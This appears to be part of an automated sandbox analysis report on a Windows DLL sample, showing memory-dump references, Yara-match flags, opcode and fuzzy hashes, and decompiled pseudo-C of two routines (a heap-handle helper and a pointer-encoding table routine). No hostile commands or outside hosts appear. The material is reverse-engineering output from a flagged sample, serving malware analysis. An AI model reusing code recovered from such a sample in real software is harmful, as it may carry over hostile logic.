                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x{
                                                                                                        • API String ID: 0-1642613173
                                                                                                        • Opcode ID: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
                                                                                                        • Instruction ID: cfab1a828be9d4f11d62def22584f191cf8c0c6105b21f987aeed96694dfa2d1
                                                                                                        • Opcode Fuzzy Hash: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
                                                                                                        • Instruction Fuzzy Hash: 992126B55097849BE348DF28C08A51BBBE1BB9C31CF810B1DF4CAA7254D378D649CB4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC123DDD90(long long __rax) {
                                                                                                        				signed int _t3;
                                                                                                        
                                                                                                        				_t3 = GetProcessHeap();
                                                                                                        				 *0x1244f930 = __rax;
                                                                                                        				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                                                        			}




                                                                                                        0x7ffc123ddd94
                                                                                                        0x7ffc123ddd9d
                                                                                                        0x7ffc123dddab

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        • Opcode ID: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
                                                                                                        • Instruction ID: 93c9b5af97c37ee048b0b534ca3fa3a752aa2ef3697ebf45193d927bbac038f2
                                                                                                        • Opcode Fuzzy Hash: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
                                                                                                        • Instruction Fuzzy Hash: DAB09228E17E5AD2EA082B216C8669422A47F48720F8A4138C64C40330DF7C20FA9B20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
                                                                                                        • Instruction ID: acc53311729b3702271ddd4d27c6e114e7717bdbebfd3a0864e34ca081a3005a
                                                                                                        • Opcode Fuzzy Hash: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
                                                                                                        • Instruction Fuzzy Hash: C691197090470CAFDB98DF68C04669DBBF2FB48344F40C1ADE849AB690D7759A19CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
                                                                                                        • Instruction ID: ee1a5b038e23b1b762728b601e6c99c8254ef48870683394c78a05e9b81e4730
                                                                                                        • Opcode Fuzzy Hash: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
                                                                                                        • Instruction Fuzzy Hash: 9A61457160460C8BDB6CDF38D4866A93BE5FB58740F24613DF866C72A2DB74D906CB44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
                                                                                                        • Instruction ID: 124210ae31362696c8e7c7fc55ee17b9d1fa189669067b7980e05abe0ce7dbb4
                                                                                                        • Opcode Fuzzy Hash: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
                                                                                                        • Instruction Fuzzy Hash: 9C81CF7190471C8FEB65DFA8C48968DBFF0FB58388F20461EE815A7262DB749945CF81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
                                                                                                        • Instruction ID: 378d96e7360db12acf5ccb9a2c1092155fc294dfe99add9db15bd0895a73080d
                                                                                                        • Opcode Fuzzy Hash: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
                                                                                                        • Instruction Fuzzy Hash: 74516C71524A8CABDBCDCE28D8C6A993BA0FB15344F90621DFC46C7292CB74D985CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
                                                                                                        • Instruction ID: 0a3e1f31290980f27e0927c2cdaa770a4be8563f500c1c2649e9a60efdb6b8c3
                                                                                                        • Opcode Fuzzy Hash: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
                                                                                                        • Instruction Fuzzy Hash: D3412655F69FDA47EE039A7A58127B04A04AFA6BD1E81E732ED0B77B01DB2C5466C200
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 60%
                                                                                                        			E00007FFC7FFC123DA370(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                                        				void* _t24;
                                                                                                        				int _t26;
                                                                                                        				signed int _t51;
                                                                                                        				void* _t52;
                                                                                                        				signed long long _t66;
                                                                                                        				signed int* _t73;
                                                                                                        				signed long long _t75;
                                                                                                        				signed long long _t77;
                                                                                                        				signed long long _t78;
                                                                                                        				signed long long _t95;
                                                                                                        				signed long long _t96;
                                                                                                        				signed long long _t98;
                                                                                                        				signed long long _t104;
                                                                                                        				long long _t115;
                                                                                                        				void* _t117;
                                                                                                        				void* _t120;
                                                                                                        				signed long long* _t123;
                                                                                                        				signed long long _t124;
                                                                                                        				signed long long _t126;
                                                                                                        				signed long long _t129;
                                                                                                        				signed long long*** _t132;
                                                                                                        
                                                                                                        				_t52 = __edi;
                                                                                                        				_t51 = __edx;
                                                                                                        				 *((long long*)(_t117 + 0x10)) = __rbx;
                                                                                                        				 *((long long*)(_t117 + 0x18)) = _t115;
                                                                                                        				 *((long long*)(_t117 + 0x20)) = __rsi;
                                                                                                        				_t66 =  *((intOrPtr*)(__rcx));
                                                                                                        				_t132 = __rcx;
                                                                                                        				_t73 =  *_t66;
                                                                                                        				if (_t73 == 0) goto 0x123da504;
                                                                                                        				_t124 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				_t111 =  *_t73 ^ _t124;
                                                                                                        				asm("dec eax");
                                                                                                        				_t75 = _t73[4] ^ _t124;
                                                                                                        				asm("dec ecx");
                                                                                                        				asm("dec eax");
                                                                                                        				if ((_t73[2] ^ _t124) != _t75) goto 0x123da476;
                                                                                                        				_t77 = _t75 - ( *_t73 ^ _t124) >> 3;
                                                                                                        				_t101 =  >  ? _t66 : _t77;
                                                                                                        				_t6 = _t115 + 0x20; // 0x20
                                                                                                        				_t102 = ( >  ? _t66 : _t77) + _t77;
                                                                                                        				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
                                                                                                        				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0x123da412;
                                                                                                        				_t7 = _t115 + 8; // 0x8
                                                                                                        				r8d = _t7;
                                                                                                        				E00007FFC7FFC123DD858(_t6, r10d & 0x0000003f, __esp, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
                                                                                                        				_t24 = E00007FFC7FFC123DA9DC(_t66, _t111);
                                                                                                        				if (_t66 != 0) goto 0x123da43a;
                                                                                                        				_t104 = _t77 + 4;
                                                                                                        				r8d = 8;
                                                                                                        				E00007FFC7FFC123DD858(_t24, 0, __esp, _t77, _t111, _t104, _t111, _t115, _t120);
                                                                                                        				_t129 = _t66;
                                                                                                        				_t26 = E00007FFC7FFC123DA9DC(_t66, _t111);
                                                                                                        				if (_t129 == 0) goto 0x123da504;
                                                                                                        				_t123 = _t129 + _t77 * 8;
                                                                                                        				_t78 = _t129 + _t104 * 8;
                                                                                                        				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                                                        				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                                                        				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0x123da476;
                                                                                                        				memset(_t52, _t26, 0 << 0);
                                                                                                        				_t126 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				r8d = 0x40;
                                                                                                        				_t14 =  &(_t123[1]); // 0x7ffc123d1024
                                                                                                        				asm("dec eax");
                                                                                                        				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                                        				_t95 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				asm("dec eax");
                                                                                                        				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                                        				_t96 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				asm("dec eax");
                                                                                                        				( *( *_t132))[1] = _t14 ^ _t96;
                                                                                                        				_t98 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				r8d = r8d - (_t51 & 0x0000003f);
                                                                                                        				asm("dec eax");
                                                                                                        				( *( *_t132))[2] = _t78 ^ _t98;
                                                                                                        				goto 0x123da507;
                                                                                                        				return 0xffffffff;
                                                                                                        			}
























                                                                                                        0x7ffc123da370
                                                                                                        0x7ffc123da370
                                                                                                        0x7ffc123da370
                                                                                                        0x7ffc123da375
                                                                                                        0x7ffc123da37a
                                                                                                        0x7ffc123da388
                                                                                                        0x7ffc123da38d
                                                                                                        0x7ffc123da390
                                                                                                        0x7ffc123da396
                                                                                                        0x7ffc123da39c
                                                                                                        0x7ffc123da3b4
                                                                                                        0x7ffc123da3ba
                                                                                                        0x7ffc123da3bd
                                                                                                        0x7ffc123da3c0
                                                                                                        0x7ffc123da3c3
                                                                                                        0x7ffc123da3c9
                                                                                                        0x7ffc123da3d7
                                                                                                        0x7ffc123da3e1
                                                                                                        0x7ffc123da3e5
                                                                                                        0x7ffc123da3e8
                                                                                                        0x7ffc123da3eb
                                                                                                        0x7ffc123da3f2
                                                                                                        0x7ffc123da3f4
                                                                                                        0x7ffc123da3f4
                                                                                                        0x7ffc123da3fe
                                                                                                        0x7ffc123da408
                                                                                                        0x7ffc123da410
                                                                                                        0x7ffc123da412
                                                                                                        0x7ffc123da416
                                                                                                        0x7ffc123da422
                                                                                                        0x7ffc123da429
                                                                                                        0x7ffc123da42c
                                                                                                        0x7ffc123da434
                                                                                                        0x7ffc123da441
                                                                                                        0x7ffc123da445
                                                                                                        0x7ffc123da45d
                                                                                                        0x7ffc123da461
                                                                                                        0x7ffc123da464
                                                                                                        0x7ffc123da46c
                                                                                                        0x7ffc123da46f
                                                                                                        0x7ffc123da476
                                                                                                        0x7ffc123da47c
                                                                                                        0x7ffc123da495
                                                                                                        0x7ffc123da49b
                                                                                                        0x7ffc123da49e
                                                                                                        0x7ffc123da4b1
                                                                                                        0x7ffc123da4ba
                                                                                                        0x7ffc123da4c0
                                                                                                        0x7ffc123da4d1
                                                                                                        0x7ffc123da4da
                                                                                                        0x7ffc123da4de
                                                                                                        0x7ffc123da4ea
                                                                                                        0x7ffc123da4f3
                                                                                                        0x7ffc123da4fe
                                                                                                        0x7ffc123da502
                                                                                                        0x7ffc123da51f

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastPrivilegeRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1334314998-0
                                                                                                        • Opcode ID: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
                                                                                                        • Instruction ID: 0a5b459047e74c2187c7e1c0b1df1be8196c59027855fb7e55519951f17d47dc
                                                                                                        • Opcode Fuzzy Hash: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
                                                                                                        • Instruction Fuzzy Hash: 3B41E72A714EAC81EF14CF26D9181A973A5BB88FE4B899036DE4D87B58DF7CD056C310
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
                                                                                                        • Instruction ID: 707c8c7feef62a70d2195b75d5e6b66e4219545dc678810288b7b2209aceacb9
                                                                                                        • Opcode Fuzzy Hash: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
                                                                                                        • Instruction Fuzzy Hash: 1161917154878DDBEBBACF24D88A7D97BB0FB48314F904219D84E8E290DB74574ACB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
                                                                                                        • Instruction ID: 49561eaafaa20b5dbb512bdc2e8c8324cc323e320cbd5a294de7a2bbabfa02a5
                                                                                                        • Opcode Fuzzy Hash: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
                                                                                                        • Instruction Fuzzy Hash: 3351B07051478C8BEBBACF28DC9A7DB3BB1FB48704F50421DA84E8E2A0DB765645CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
                                                                                                        • Instruction ID: cab1e4afcb3e4e3efad056c987e19407a7ae96f8ba765043352ee3f473a28ce2
                                                                                                        • Opcode Fuzzy Hash: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
                                                                                                        • Instruction Fuzzy Hash: 7A51597191474DCBDF6DCF68C88A6DDBBB0FF08344F004219E94662291DB799949CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
                                                                                                        • Instruction ID: 0d5a1e45f689093ba705f26d6d0b7ee4761fe465e88e59cb2662693f670c6f5b
                                                                                                        • Opcode Fuzzy Hash: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
                                                                                                        • Instruction Fuzzy Hash: 99517CB590034A8FDB88CF64C58A4DF7FB0BB68398F204619F856962A0D374D6A5CBD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
                                                                                                        • Instruction ID: 6b1a579500f7469a5a283cf0a7520b14203c8905753f3a8ac0622774f88945dd
                                                                                                        • Opcode Fuzzy Hash: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
                                                                                                        • Instruction Fuzzy Hash: 1241D3B050034E8BDB48CF64D88A4DE7FF0FB68398F214619F859A6250D378D6A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
                                                                                                        • Instruction ID: 4275e61531d4984f43622383f8721a212c43d9f9e5acc043d588a3e2cbca8aaf
                                                                                                        • Opcode Fuzzy Hash: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
                                                                                                        • Instruction Fuzzy Hash: 0741D2B090074E8FDB48CF64C98A5DE7FB1FBA8394F204219EC4AA6250D374D6A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
                                                                                                        • Instruction ID: afd4a856b60e5dc0eb8acee87462e8dc665325ca188dc724d3a88843a6c40c3d
                                                                                                        • Opcode Fuzzy Hash: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
                                                                                                        • Instruction Fuzzy Hash: 6041AFB180438E8FDF48CF64C88A5DE7BB0FB58348F104A19E86696264D3B9D664CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
                                                                                                        • Instruction ID: 224c6f81855e22c7893a2b7f2b7cfff3a5734a3a9938c9b8f57012155b825125
                                                                                                        • Opcode Fuzzy Hash: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
                                                                                                        • Instruction Fuzzy Hash: 3041B1B090478E8BDF49CF68D84A5DE7BA0FB58348F104A1DEC66A6294D3B4D664CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
                                                                                                        • Instruction ID: 49a2f425b0a366156263d2a3b3444c35eadce35315b0c57ee30031dbbbdec485
                                                                                                        • Opcode Fuzzy Hash: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
                                                                                                        • Instruction Fuzzy Hash: FB41E6B090034A8BDF48DF68C88A5DE7FB1FB58358F10461DF85AA6390D37896A5CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
                                                                                                        • Instruction ID: 6daa388222a5a84c7974237e422c02caa7ff578f64bce21c4d2575711bd59858
                                                                                                        • Opcode Fuzzy Hash: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
                                                                                                        • Instruction Fuzzy Hash: EB41D5B190074E8BDF48CF64C48A5DE7FB0FB68358F214618E855A6290D3B8D6A5CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
                                                                                                        • Instruction ID: d8d0a970803080bdb9b0c4b9adcb29ea95a621f075ad5d7819bf759c13dfa2c1
                                                                                                        • Opcode Fuzzy Hash: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
                                                                                                        • Instruction Fuzzy Hash: AE3105B090034A8BDB4CDF68C88A4DE3FA1BB58398F10461DFC5A9A350D3B4D9A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
                                                                                                        • Instruction ID: 8f5d51aba00c4f23d52c296157a313ffc4782a84c6f71662d1847f1d9af8e599
                                                                                                        • Opcode Fuzzy Hash: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
                                                                                                        • Instruction Fuzzy Hash: E431ADB55187818BC348DF28C54A51ABBE1FB8C308F504B2EF8CAA6294D778D6058B4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
